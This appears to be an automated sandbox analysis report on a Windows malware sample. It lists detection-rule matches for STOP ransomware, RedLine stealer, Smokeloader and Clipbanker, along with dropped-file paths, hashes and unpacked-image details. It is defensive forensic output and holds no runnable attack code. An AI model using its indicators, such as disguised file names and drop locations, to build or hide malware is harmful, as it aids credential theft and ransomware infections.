Source: 0000001E.00000002.477600932.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001E.00000002.477600932.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000007.00000002.460214856.0000000000838000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.445573902.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001E.00000002.477942290.0000000001001000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001E.00000002.477942290.0000000001001000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000004.00000002.445509996.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000028.00000000.480111248.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000028.00000000.480111248.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000004.00000002.446406704.00000000022D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.450548636.0000000002490000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000022.00000002.483526399.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001B.00000002.490286812.0000000002380000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000018.00000002.478487593.00000000008C8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.380107918.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.442702951.00000000024A5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000022.00000002.482578416.0000000000887000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: D804.exe PID: 2560, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: D804.exe PID: 772, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: D804.exe PID: 1340, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: D804.exe PID: 6088, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: D804.exe PID: 128, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: D804.exe PID: 4528, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: B46F.exe PID: 4928, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: B46F.exe PID: 2576, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: A170.exe PID: 1868, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: D804.exe PID: 1264, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, type: DROPPED	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: C:\Users\user\AppData\Local\Temp\9F31.exe, type: DROPPED	Matched rule: Detects downloader / injector Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe, type: DROPPED	Matched rule: Detects downloader / injector Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\3C54.exe, type: DROPPED	Matched rule: Detects downloader / injector Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\6FA9.exe, type: DROPPED	Matched rule: Detects downloader / injector Author: ditekSHen

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 68 -ip 68

Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_004118DE
Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_0040A4AA
Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_0040C9B3
Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_00411E22
Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_004132E1
Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_0041139A
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_004118DE
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_0040A4AA
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_0040C9B3
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_00411E22
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_004132E1
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_0041139A
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Code function: 5_2_004118DE
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Code function: 5_2_0040A4AA
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Code function: 5_2_0041251A
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Code function: 5_2_0040C9B3
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Code function: 5_2_004132E1
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Code function: 5_2_0041139A

Source: XandETC.exe.20.dr

Static PE information: Number of sections : 11 > 10

Source: 01860199.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 30.0.build3.exe.1000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.0.build3.exe.1000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.A170.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 29.2.A170.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 29.2.A170.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.D804.exe.26915a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.2.D804.exe.26915a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.D804.exe.26915a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.D804.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 16.2.D804.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.D804.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 26.2.B46F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 26.2.B46F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 26.2.B46F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 34.2.913F.exe.24115a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 34.2.913F.exe.24115a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 34.2.913F.exe.24115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 29.2.A170.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 29.2.A170.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 29.2.A170.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 27.2.A170.exe.24c15a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 27.2.A170.exe.24c15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 27.2.A170.exe.24c15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.B46F.exe.24d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.2.B46F.exe.24d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.B46F.exe.24d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 40.2.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 40.2.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 37.2.913F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 37.2.913F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 37.2.913F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.2.D804.exe.24d15a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.2.D804.exe.24d15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.2.D804.exe.24d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.D804.exe.25315a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 13.2.D804.exe.25315a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.D804.exe.25315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 31.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 31.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 31.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 31.2.D804.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 31.2.D804.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 31.2.D804.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.B46F.exe.24d15a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.2.B46F.exe.24d15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.B46F.exe.24d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.D804.exe.26915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.2.D804.exe.26915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.D804.exe.26915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 30.2.build3.exe.1000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
